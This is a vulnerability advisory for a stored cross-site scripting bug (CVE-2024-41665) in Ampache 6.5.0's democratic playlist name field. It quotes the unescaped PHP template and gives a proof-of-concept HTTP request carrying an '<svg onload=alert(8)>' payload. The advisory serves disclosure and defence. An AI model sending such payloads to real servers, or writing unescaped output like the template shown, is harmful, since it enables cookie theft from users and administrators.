Stored XSS Vulnerability in Ampache 6.5.0 Democratic Playlist Configuration

[Hebing123]

Summary

Ampache 6.5.0 is vulnerable to a stored cross-site scripting (XSS) vulnerability. This vulnerability exists in the "Playlists - Democratic - Configure Democratic Playlist" feature. An attacker with Content Manager permissions can set the Name field to . When any administrator or user accesses the Democratic functionality, they will be affected by this stored XSS vulnerability.

Details

The vulnerability is due to insufficient filtering of the $title variable in the /public/templates/show_box_top.inc.php file.
Vulnerable Code:

<?php

declare(strict_types=0);

/**
 * vim:set softtabstop=4 shiftwidth=4 expandtab:
 *
 * LICENSE: GNU Affero General Public License, version 3 (AGPL-3.0-or-later)
 * Copyright Ampache.org, 2001-2023
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Affero General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Affero General Public License for more details.
 *
 * You should have received a copy of the GNU Affero General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 *
 */

$class = $class ?? 'box';
$title = $title ?? ''; ?>

<div class="<?php echo $class; ?>">
  <div class="box-inside">
    <div class="box-top">
      <div class="box-left-top"></div>
      <div class="box-right-top"></div>
    </div>
    <?php if ($title) { ?>
       <h3 class="box-title"><?php echo $title; ?></h3>
      <?php } ?>
    <div class="box-content clearfix">

PoC

The following HTTP request demonstrates the exploitation of this vulnerability.

POST /democratic.php?action=create HTTP/1.1
Host: 192.168.0.10:1050
Content-Length: 678
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.10:1050
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypldFGg4VEESHNAru
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10:1050/democratic.php?action=manage
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: 19610f92b847c9ad674caaf9d83e7955_ssl=1c40587b-3702-4aea-8be2-ea4050f38752.0bFqmuq06lhqH0o6eIevY88t7Fo; ampache=qinlqrvkl4oolcf39tjuqbb8sm; ampache_user=admin; ampache_lang=fr_FR
Connection: close

------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="name"

<svg onload=alert(8)>
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="democratic"

2
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="cooldown"

0
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="level"

25
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="make_default"

1
------WebKitFormBoundarypldFGg4VEESHNAru
Content-Disposition: form-data; name="form_validation"

623b1b7e60c4f1f25810c1f84b2f7d3e
------WebKitFormBoundarypldFGg4VEESHNAru--

Impact

An attacker with Content Manager permissions can exploit this vulnerability to obtain the cookies of any user or administrator who accesses the democratic.php file.

[Hebing123]

GHSA-cp44-89r2-fxph

[Hebing123]

CVE-2024-41665